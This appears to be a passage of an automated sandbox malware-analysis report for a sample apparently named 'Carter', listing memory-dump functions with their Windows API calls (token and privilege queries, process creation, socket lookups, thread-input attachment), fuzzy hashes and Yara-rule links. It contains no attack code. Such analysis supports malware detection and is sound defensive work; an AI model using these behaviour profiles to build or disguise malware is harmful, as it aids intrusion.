Function 00AD9274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AD8D3F
Part of subcall function 00AD8D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D49
Part of subcall function 00AD8D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D58
Part of subcall function 00AD8D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D5F
Part of subcall function 00AD8D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AD8D75

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00AD92C1
_memcmp.LIBCMT ref: 00AD92E4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AD931A
HeapFree.KERNEL32(00000000), ref: 00AD9321

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
Instruction ID: ec9f3a1ab67df505105c0809dc48681e2ecea20459a3e5971916aec0bc15e009
Opcode Fuzzy Hash: 1ef0c92a861c0e1d6d70bbbec83e4aedf9764bc6dfa7607e0ac19c4b490d5664
Instruction Fuzzy Hash: A4219D31E40109EFDB14DFA5C949BEEB7B8FF44301F14805AE896AB390D770AA44CB90

Function 00B0634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00B063BD
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063D7
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B063E5
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B063F3

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
Instruction ID: 7fc01b417bd9c570663566dbe074768d921ad42addc381b3ee66492b2a4591c2
Opcode Fuzzy Hash: 3e082759615caa05d0569bdec7e442102e2957c0381a117f8f1a39bafa6af8af
Instruction Fuzzy Hash: 7511B131305514AFD705BB28DC55FBA7BA9EF45320F148259F916C72D1CBB0AD408B94

Function 00ADE45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ADF858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF867
Part of subcall function 00ADF858: lstrcpyW.KERNEL32(00000000,?,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADF88D
Part of subcall function 00ADF858: lstrcmpiW.KERNEL32(00000000,?,00ADE46F,?,?,?,00ADF262,00000000,000000EF,00000119,?,?), ref: 00ADF8BE

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE488
lstrcpyW.KERNEL32(00000000,?,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4AE
lstrcmpiW.KERNEL32(00000002,cdecl,?,00ADF262,00000000,000000EF,00000119,?,?,00000000), ref: 00ADE4E2

Strings

cdecl, xrefs: 00ADE4D9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 95340f2309d0c7fbe6a11c76c65326c0af8252a0f34e30751df7c93c0e4271d0
Instruction ID: eb578b434cd8783d312c69188893c99819ee8c5527620e877827c210c23ac7f7
Opcode Fuzzy Hash: 95340f2309d0c7fbe6a11c76c65326c0af8252a0f34e30751df7c93c0e4271d0
Instruction Fuzzy Hash: 2B115B7A200345AFDB25AF24EC45D7E77A9FF45350B90802BF806CB3A0EB719990D7A1

Function 00AB5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AB5331

Part of subcall function 00AA593C: __FF_MSGBANNER.LIBCMT ref: 00AA5953
Part of subcall function 00AA593C: __NMSG_WRITE.LIBCMT ref: 00AA595A
Part of subcall function 00AA593C: RtlAllocateHeap.NTDLL(01740000,00000000,00000001,?,00000004,?,?,00AA1003,?), ref: 00AA597F

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
Instruction ID: 6e31ab508b04045ff86fd3596f7af2a9eb16409b70777692c590acc54ba3fb11
Opcode Fuzzy Hash: c9de3625ec5d5f1d368bdfa4ee17bfe96945bf26272b30601a791e6d48320007
Instruction Fuzzy Hash: CE118232D05A16AFCB243F74AD157DA3AD8AF163A0B10452AF9589F2D2DFB489409790

Function 00AE4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE4385
_memset.LIBCMT ref: 00AE43A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00AE43F8
CloseHandle.KERNEL32(00000000), ref: 00AE4401

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
Instruction ID: d73d34f8d635f7e97fb000dcaa4ea876a01425aaccdc0640eb822065869ee46b
Opcode Fuzzy Hash: 546cac9450196f55561169b5c931287c3f09b19aa6288783cda0a64fdbc7a5dc
Instruction Fuzzy Hash: 78110A719012287AD7309BA5AC4DFEBBB7CEF49720F00459AF908E72C0D6744E808BA4

Function 00AF6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AE7E51,?,?,00000000), ref: 00A94041
Part of subcall function 00A9402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AE7E51,?,?,00000000,?,?), ref: 00A94065

gethostbyname.WSOCK32(?,?,?), ref: 00AF6A84
WSAGetLastError.WSOCK32(00000000), ref: 00AF6A8F
_memmove.LIBCMT ref: 00AF6ABC
inet_ntoa.WSOCK32(?), ref: 00AF6AC7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
Instruction ID: 36ad75ea45cbd1dd0baa47a527321eafddc5940f89a51b2aa4e49f9a8e4dc0d3
Opcode Fuzzy Hash: e0c7b5c80adeb02a3b09bdc1dfae34673fbd0736b6c2c1f87798603fc6b58803
Instruction Fuzzy Hash: E5116375600109AFCB04FBE4CE86CEEB7B8EF08311B544165F602A72A1DF70AE40CB91

Function 00AD96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00AD9719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD9741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00AD975C

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
Instruction ID: 808076a1add889721b2ec957cf10676d9e702b404cdfb9d470457e8a9fcd1954
Opcode Fuzzy Hash: b58ec3223e1bfc2dbf1447c9469d3cd7c24b9b6d54bcbf90e2d6c693c9cd7f7c
Instruction Fuzzy Hash: 75115A39900218FFEB10DF95CD84EDEBBB8FB48710F204092E901B7290D671AE10DB90

Function 00A8166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

DefDlgProcW.USER32(?,00000020,?), ref: 00A816B4
GetClientRect.USER32(?,?), ref: 00ABB93C
GetCursorPos.USER32(?), ref: 00ABB946
ScreenToClient.USER32(?,?), ref: 00ABB951

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
Instruction ID: 6588e0ab5c576a5e2de78e017f8dd9dfdfae46bb9f67b5697dab947b09a90e36
Opcode Fuzzy Hash: 8425e3a6163e85b52fdcf2ca200c9a7a12090b9a0ac3ce0355738885a612a472
Instruction Fuzzy Hash: A0112839A10119ABCB10FF54C885DFE77B9FB05300F544466F981E7150EB74BA92CBA1

Function 00A82111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A8214F
GetStockObject.GDI32(00000011), ref: 00A82163
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A8216D

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
Instruction ID: d0e7a149946f67070f574e5b066aeb7380ea77325535d04c5c409d044110d47f
Opcode Fuzzy Hash: 434ca1b1c29da95d7a6b2bf9a521ec383878686cbbf0e2a3c0dac24611b696dd
Instruction Fuzzy Hash: 1B118B7211124DBFDB02AFA09C48EEABB69EF58354F154202FA0452064CB71DCA0DBA0

Function 00AE1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE1983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE198D
Sleep.KERNEL32(?,?,?,?,?,?,?,00AE04EC,?,00AE153F,?,00008000), ref: 00AE19C0

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
Instruction ID: 6f98d533f980a6aa1f9692c01a17f4915307efe2088934c6869120e901c259ff
Opcode Fuzzy Hash: d2d1d714062449e9456198ba6b4f829981fdf566fda3c8af2b8547272bae192b
Instruction Fuzzy Hash: 45113C31D0456DEBCF00AFE6D998AEEBB78FF09751F408155E980B3242CB3496A08B95

Function 00B0E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00B0E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00B0E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00B0E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00B0E234

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
Instruction ID: ca9674c70e9441e898109c279bb2ad069436972c05a34e6fe5bebdfaf7de5ffd
Opcode Fuzzy Hash: 8bfd5ab92a10f77c9f6f3acfa76182743d2604e2d8bb2b2daaba5aec03b58b48
Instruction Fuzzy Hash: FD115EB52053049BE7309F51ED48F93BBFCEB40B00F108999A626D6190DBB0E5449BA1

Function 00AB71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00AB720B

Part of subcall function 00AB78F2: __fltout2.LIBCMT ref: 00AB791B

__cftog_l.LIBCMT ref: 00AB7231
__cftoe_l.LIBCMT ref: 00AB7263

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: ce5863f4027d1d8f18c25c9af6f7905e581a62f7b280632b567b0a3466d7eea1
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 30019E3204814EBBCF125F84CC01CEE3F2ABBA9340F098515FE1868132C776C9B1AB81

Function 00B0B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00B0B956
ScreenToClient.USER32(?,?), ref: 00B0B96E
ScreenToClient.USER32(?,?), ref: 00B0B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B0B9AD

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
Instruction ID: 0a96f412bf2ad4ec2411d46993958a4749e2b6c03b164052c36dfe8f2b7cd141
Opcode Fuzzy Hash: 069d795c5b2355c9fc89fbcd4a9df896a8ae4bc548efa81b57f3561975633974
Instruction Fuzzy Hash: B81144B9D00209EFDB41DF98C984AEEBBF9FF48310F508156E914E3610D775AA658F50

Function 00B0BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B0BCB6
_memset.LIBCMT ref: 00B0BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B48F20,00B48F64), ref: 00B0BCF4
CloseHandle.KERNEL32 ref: 00B0BD06

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
Instruction ID: 794f700a2ea8980b5d852e05aff99e6dc73e548e03300f8d4fdc55b441ff7828
Opcode Fuzzy Hash: 237416d36b093ed81f5a13a0ad9f75e4e9ae480a7dbc9ff1e46bf3eea2550f2c
Instruction Fuzzy Hash: 3AF05EB6550304BFE6503B65AC05FBF7A9DEB0A750F004921BA08EB1A2DF724A1497A9

Function 00AE7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00AE71A1

Part of subcall function 00AE7C7F: _memset.LIBCMT ref: 00AE7CB4

_memmove.LIBCMT ref: 00AE71C4
_memset.LIBCMT ref: 00AE71D1
LeaveCriticalSection.KERNEL32(?), ref: 00AE71E1

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: be8ecae95c319ac43de39d84cbf2e1fddcc3e70e9b32823c2a6e0c815749c766
Instruction ID: bd980256a38185fe9e4d283ba047c1d27ba406083abe331b56c102f5ee91cfdf
Opcode Fuzzy Hash: be8ecae95c319ac43de39d84cbf2e1fddcc3e70e9b32823c2a6e0c815749c766
Instruction Fuzzy Hash: F8F0543A100104ABCF016F55DD85A8ABB29EF4A320F04C051FE085F25ACB75A951DBB4

Function 00B0C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00A816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A81729
Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81738
Part of subcall function 00A816CF: BeginPath.GDI32(?), ref: 00A8174F
Part of subcall function 00A816CF: SelectObject.GDI32(?,00000000), ref: 00A81778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B0C3E8
LineTo.GDI32(00000000,?,?), ref: 00B0C3F5
EndPath.GDI32(00000000), ref: 00B0C405
StrokePath.GDI32(00000000), ref: 00B0C413

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
Instruction ID: b977add5847bd41d1cdcb75ff16aee132551dcedc3c3ca005f1d273bbff7c743
Opcode Fuzzy Hash: f2daae1cff7f5494c096d2e10d0f5dfa8a4d4dc93ef9725fe9750535833fafe4
Instruction Fuzzy Hash: 05F0BE31045218BBDB126F55AC0EFCE3F99BF0A310F448040FA51621E1CBB416A5DBA9

Function 00ADAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ADAA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00ADAA82
GetCurrentThreadId.KERNEL32 ref: 00ADAA89
AttachThreadInput.USER32(00000000), ref: 00ADAA90

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
